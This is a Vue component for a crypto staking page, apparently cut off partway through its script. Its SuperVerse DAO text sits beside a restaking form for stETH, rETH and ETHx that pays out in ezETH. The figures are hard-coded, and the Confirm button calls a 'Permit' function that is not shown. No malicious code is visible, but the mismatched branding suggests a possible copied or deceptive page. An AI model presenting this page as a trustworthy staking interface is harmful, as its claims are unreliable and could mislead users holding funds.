<template>
  <div :class="yeslog == '0' ? 'yscon' : 'ysconf'">
    <h1>STAKING</h1>
    <p>
      Our system is currently processing for the next epoch, please continue to
      check back.
    </p>
    <div class="yscbox flex jus">
      <div :class="yeslog == '0' ? 'yscbl flex' : 'yscblnone'">
        <div class="yscblcon flex flexcol">
          <div class="yscbltop flex">
            <img src="../assets/slogos.png" alt="" />
            <h1>SuperVerse DAO Staking</h1>
          </div>
          <div class="yscbltxt">
            SuperVerse DAO staking allows community members to stake SUPER
            tokens and NFTs in order to receive ETH rewards generated by fees
            and royalties collected from SuperVerse DAO products, and eventually
            qualify to participate in DAO governance.
            <a href="https://superverse.cool/staking-terms/" class="font-bold"
              >Staking Terms apply.</a
            >
          </div>
          <div class="yscblk yscblkh flex jus">
            <div class="yscblkf yscblkfb flex flexcol jus">
              <p>If You Staked</p>
              <div class="yscblkje flex">
                <img class="logoimg" src="../assets/slogos.png" alt="" />
                <span>1,761.16</span>
              </div>
              <div class="yscblkd">$1,000</div>
            </div>
            <div class="yscblkf yscblkfb flex flexcol jus">
              <p>Est. 24h Rewards</p>
              <div class="yscblkje flex">
                <img
                  style="margin-left: 0"
                  src="../assets/eth-color.svg"
                  alt=""
                />
                <span class="fontblue">0.000029</span>
              </div>
              <div class="yscblkd">$0.07</div>
            </div>
          </div>
          <div class="yscbltcon">
            Our staking interface helps estimate rewards and draft blockchain
            transactions for you to review and execute at your discretion. See
            our
            <a href="https://superverse.cool/staking-terms/" class="font-bold"
              >Staking Terms</a
            >
            for more. Staking rewards estimates are based on current information
            from the public DAO Staker contract. Estimates are based on the
            total value of Pooled Assets and Rewards available and may change
            block-by-block. You may use our Interface to draft requests to stake
            or unstake $SUPER, EllioTrades NFTs, or SuperFarm Genesis NFTs to
            and from the DAO Staker at anytime, but you must review any
            transaction in your Wallet for accuracy before choosing to sign any
            transaction. Only you can review and authorize transactions and any
            transaction or ‘gas’ fees your Wallet may assess.
          </div>
        </div>
      </div>
      <div :class="yeslog == '1' ? 'yscbl flex' : 'yscblnone'">
        <div class="yscblcon flex flexcol">
          <div class="yscbltop flex">
            <img src="../assets/slogos.png" alt="" />
            <h1>SuperVerse DAO Staking</h1>
          </div>
          <div class="yscbltxt">
            SuperVerse DAO staking allows community members to stake SUPER
            tokens and NFTs in order to receive ETH rewards generated by fees
            and royalties collected from SuperVerse DAO products, and eventually
            qualify to participate in DAO governance.
            <a href="https://superverse.cool/staking-terms/" class="font-bold"
              >Staking Terms apply.</a
            >
          </div>
          <div class="yscbltinpx flex flexcol">
            <div class="yscbltinpxy flex jus">
              <span>Total Staking Power</span>
              <div>0.00</div>
            </div>
            <div class="yscbltinpxt flex yscblk">
              <div class="yscblkf yscblkfa flex flexcol">
                <p>Your Staked SUPER</p>
                <div class="yscblkje flex">
                  <img class="logoimg" src="../assets/slogos.png" alt="" /><span
                    >0.00</span
                  >
                </div>
                <div class="yscblkd">$0.00</div>
              </div>
              <div class="yscblkf yscblkfa flex flexcol">
                <p>Your Staked NFTs (0)</p>
              </div>
              <div class="yscblkf yscblkfa flex flexcol">
                <p>Est. 24h Rewards</p>
                <div class="yscblkje flex">
                  <img
                    style="margin-left: 0"
                    src="/img/eth-color.f9154fe1.svg"
                    alt=""
                  /><span class="fontblue">0.000000</span>
                </div>
                <div class="yscblkd">$0.00</div>
              </div>
            </div>
            <div class="yscbltinpxs flex jus">
              <span>Total Pending Rewards</span>
              <div class="yscbltinpxsr flex flexcol">
                <div class="yscbltinpxsrt flex">
                  <img src="../assets/eth-color.svg" alt="" />
                  <span>0.0000000000</span>
                </div>
                <span>$0.00</span>
              </div>
            </div>
            <button class="yscbltinpxf">Claim Rewards</button>
          </div>
          <div class="yscbltcon">
            Our staking interface helps estimate rewards and draft blockchain
            transactions for you to review and execute at your discretion. See
            our
            <a href="https://superverse.cool/staking-terms/" class="font-bold"
              >Staking Terms</a
            >
            for more. Staking rewards estimates are based on current information
            from the public DAO Staker contract. Estimates are based on the
            total value of Pooled Assets and Rewards available and may change
            block-by-block. You may use our Interface to draft requests to stake
            or unstake $SUPER, EllioTrades NFTs, or SuperFarm Genesis NFTs to
            and from the DAO Staker at anytime, but you must review any
            transaction in your Wallet for accuracy before choosing to sign any
            transaction. Only you can review and authorize transactions and any
            transaction or ‘gas’ fees your Wallet may assess.
          </div>
        </div>
      </div>
      <div class="yscbr flex flexcol">
        <div class="yscbrbox">
          <div class="yscbrbtop flex">
            <button
              @click="changetab('0')"
              :class="
                statab == '0' ? 'yscbrbttab yscbrbttabactive' : 'yscbrbttab '
              "
            >
              STAKE
            </button>
            <button class="yscbrbttab">WITHDRAW</button>
          </div>
          <div :class="statab == '0' ? 'yscbrbcon' : 'yscbrbconnone'">
            <div class="yscbrbcnr flex flexcol">
              <div class="ystabay flex flexcol">
                <div class="ystabayf flex jus">
                  <p>Restake</p>
                  <span>Balance: {{ userbla }}</span>
                </div>
                <div class="ystabacon flex">
                  <div class="ystabacl ystabayfy flex">
                    <div @click="stalists('1')" class="ystabaclf flex jus">
                      <img :src="staimgy" alt="" />
                      <span>{{ stab }}</span>
                      <svg
                        stroke="currentColor"
                        fill="currentColor"
                        stroke-width="0"
                        viewBox="0 0 1024 1024"
                        class="text-gray-400 dark:text-opacity-50"
                        height="1em"
                        width="1em"
                        xmlns="http://www.w3.org/2000/svg"
                      >
                        <path
                          d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"
                        ></path>
                      </svg>
                    </div>
                    <div
                      :class="
                        stashow == '1' ? 'ystalist ystalists' : 'ystalist'
                      "
                    >
                      <div
                        v-for="(item, index) in stalist"
                        :key="index"
                        class="ystalistf flex"
                        @click="changebs(item, index)"
                      >
                        <img :src="item.dbimg" alt="" />
                        <p>{{ item.dbtxt }}</p>
                      </div>
                    </div>
                  </div>
                  <div class="ystabacr ystabacry">
                    <div class="ystabacrtop flex jus">
                      <input
                        @input="sinput()"
                        type="text"
                        v-model="inpval"
                        placeholder="0.0"
                      />
                      <button
                        :class="
                          yeslog == '1' ? 'ystabacrtopb' : 'ystabacrtopbn'
                        "
                        @click="stabalance()"
                      >
                        MAX
                      </button>
                      <button
                        :class="
                          yeslog == '0' ? 'ystabacrtopbno' : 'ystabacrtopbn'
                        "
                      >
                        MAX
                      </button>
                    </div>
                    <div class="ystabacrbot">
                      <p>${{ userbla }}</p>
                    </div>
                  </div>
                </div>
              </div>
              <p :class="balanceErr == '1' ? 'errtxts errtxt' : 'errtxt'">
                Insufficient balance.
              </p>
              <div style="margin: 1.5rem 0" class="ystabay flex flexcol">
                <div class="ystabayf flex jus">
                  <p>Receive</p>
                  <span>Balance: {{ userusdtbla }}</span>
                </div>
                <div class="ystabacon flex">
                  <div class="ystabacl ystabayft flex">
                    <div class="ystabaclf flex">
                      <img src="../assets/ezETH.svg" alt="" />
                      <span>ezETH</span>
                    </div>
                  </div>
                  <div class="ystabacr ystabacrt">
                    <div class="ystabacrtop flex jus">
                      <input
                        @input="sinput()"
                        type="text"
                        v-model="inpval"
                        placeholder="0.0"
                      />
                    </div>
                    <div class="ystabacrbot">
                      <p>${{ userusdtbla }}</p>
                    </div>
                  </div>
                </div>
              </div>
              <button
                @click="connect()"
                :class="
                  yeslog == '0' ? 'yscbrbcnrs' : 'yscbrbcnrs yscbrbcnrsno'
                "
              >
                Connect Wallet
              </button>
              <button
                @click="Permitbut()"
                :class="
                  yeslog == '1' ? 'yscbrbcnrs' : 'yscbrbcnrs yscbrbcnrsno'
                "
              >
                Confirm
              </button>
            </div>
          </div>
          <div :class="statab == '1' ? 'yscbrbcon' : 'yscbrbconnone'">
            <div class="yscbrbcnr flex flexcol">
              <div class="yscbrbcnry">
                <p>Unstake SUPER</p>
                <span
                  >Unstaking SUPER will automatically claim your ETH rewards on
                  the same transaction.</span
                >
                <div class="yscbrbinp">
                  <input @input="unsinput()" type="text" v-model="inpval" />
                  <span @click="stabalance()">MAX</span>
                </div>
                <span style="margin: 0.5rem 0 0"
                  >Staked: {{ userbla }} SUPER</span
                >
              </div>
              <div class="yscbrbcnry">
                <p>Unstake SUPER</p>
                <span
                  >Unstaking SUPER will automatically claim your ETH rewards on
                  the same transaction.</span
                >
                <div class="yscbrbinp">
                  <input @input="unsinput()" type="text" v-model="inpvalt" />
                  <span @click="statbalance()">MAX</span>
                </div>
                <span style="margin: 0.5rem 0 0"
                  >Staked: {{ userusdtbla }} SUPER</span
                >
              </div>
              <button
                :class="
                  yeslog == '0' ? 'yscbrbcnrs yscbrbcnrsno' : 'yscbrbcnrs'
                "
              >
                Unstake
              </button>
            </div>
          </div>
        </div>
        <div :class="ethshow == '1' ? 'yscbrbend yscbrbendh' : 'yscbrbend'">
          <div @click="changeeth('1')" class="yscbrbdy flex jus">
            <p>ezETH = $ 2,328.48</p>
            <svg
              stroke="currentColor"
              fill="currentColor"
              stroke-width="0"
              viewBox="0 0 1024 1024"
              class="yscbrbdyjt"
              height="1em"
              width="1em"
              xmlns="http://www.w3.org/2000/svg"
            >
              <path
                d="M890.5 755.3L537.9 269.2c-12.8-17.6-39-17.6-51.7 0L133.5 755.3A8 8 0 0 0 140 768h75c5.1 0 9.9-2.5 12.9-6.6L512 369.8l284.1 391.6c3 4.1 7.8 6.6 12.9 6.6h75c6.5 0 10.3-7.4 6.5-12.7z"
              ></path>
            </svg>
          </div>
          <div class="yscbrbdt flex flexcol">
            <div class="yscbrbdtf flex jus">
              <span>APR</span>
              <p>{{ ethxx.APR }}</p>
            </div>
            <div class="yscbrbdtf flex jus">
              <span>Exchange Rate</span>
              <p>{{ ethxx.Exchange }}</p>
            </div>
            <div class="yscbrbdtf flex jus">
              <span>Transaction Cost</span>
              <p>{{ ethxx.Transaction }}</p>
            </div>
            <div class="yscbrbdtf flex jus">
              <span>Reward Fee</span>
              <p>{{ ethxx.Reward }}</p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div
    @click="statcs('0')"
    :class="istcshow == '0' ? 'ysbgtcnone' : 'ysbgtc flex'"
  >
    <div @click.stop="isstop()" class="ysbgtcbox">
      <img @click="statcs('0')" src="../assets/close-line.svg" alt="" />
      <div class="ysbgtcbtop">Your Staked NFTs (0)</div>
    </div>
  </div>
  <img style="display: none" src="../assets/stETH.svg" alt="" />
  <img style="display: none" src="../assets/ETHb.svg" alt="" />
</template>

<script setup>
import { ref, onMounted } from "vue";
import bus from "../utils/bus";
import { ethers } from "ethers";
import { init, useOnboard } from "@web3-onboard/vue";
import injectedModule from "@web3-onboard/injected-wallets";
let yeslog = ref("0");
let statab = ref("0");
let inpval = ref("0");
let inpvalt = ref("0");
let userbla = ref("0");
let balanceErr = ref("0");
let userusdtbla = ref("0");
let istcshow = ref("0");
let stashow = ref("0");
let ethshow = ref("0");
let xhladdress = ref("");
let xethbalance = ref("");
let xusdtbalance = ref("");
let asset = ref({ name: "", address: "", balance: "" });
let staimgy = ref("/img/stETH.d147b0fc.svg");
let ethxx = ref({
  APR: "3.02%",
  Exchange: "1 wBETH = 1.02666 ezETH",
  Transaction: "~ $6.79",
  Reward: "10%",
});
let stab = ref("stETH");
let stayaddress = ref("0xae7ab96520de3a18e5e111b5eaab095312d7fe84");
let stalist = ref([
  {
    dbimg:
      "data:image/jpeg;base64,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",
    dbtxt: "rETH",
    dbaddress: "0xae78736Cd615f374D3085123A210448E74Fc6393",
  },
  {
    dbimg: "/img/stETH.d147b0fc.svg",
    dbtxt: "stETH",
    dbaddress: "0xae7ab96520de3a18e5e111b5eaab095312d7fe84",
  },
  {
    dbimg: "/img/ETHb.4213cf87.svg",
    dbtxt: "ETHx",
    dbaddress: "0xA35b1B31Ce002FBF2058D22F30f95D405200A15b",
  },
  {
    dbimg:
      "data:image/jpeg;base64,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